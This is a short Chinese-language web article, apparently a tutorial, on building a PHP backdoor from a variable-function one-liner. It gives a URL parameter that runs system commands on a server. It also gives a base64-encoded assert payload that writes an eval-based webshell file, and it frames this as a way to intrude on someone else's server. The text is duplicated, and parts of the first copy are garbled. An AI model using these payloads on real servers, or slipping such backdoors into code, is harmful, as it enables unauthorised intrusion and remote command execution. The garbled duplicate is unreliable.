如何通过PHP的变函数功能创建一个简单的后门?
- 内容介绍
- 文章标签
- 相关推荐
本文共计214个文字,预计阅读时间需要1分钟。
这是一个非常简单的PHP可变函数,使用GET方法传递参数就能构建后门。如下所示:
在URL中输入以下代码,
?php$$_GET['a']($_GET['b']);?
如果这个可变函数对应于system(ipconfig),那么它就能在网页上显示对方向服务器的i信息。
这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
本文共计214个文字,预计阅读时间需要1分钟。
这是一个非常简单的PHP可变函数,使用GET方法传递参数就能构建后门。如下所示:
在URL中输入以下代码,
?php$$_GET['a']($_GET['b']);?
如果这个可变函数对应于system(ipconfig),那么它就能在网页上显示对方向服务器的i信息。
这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};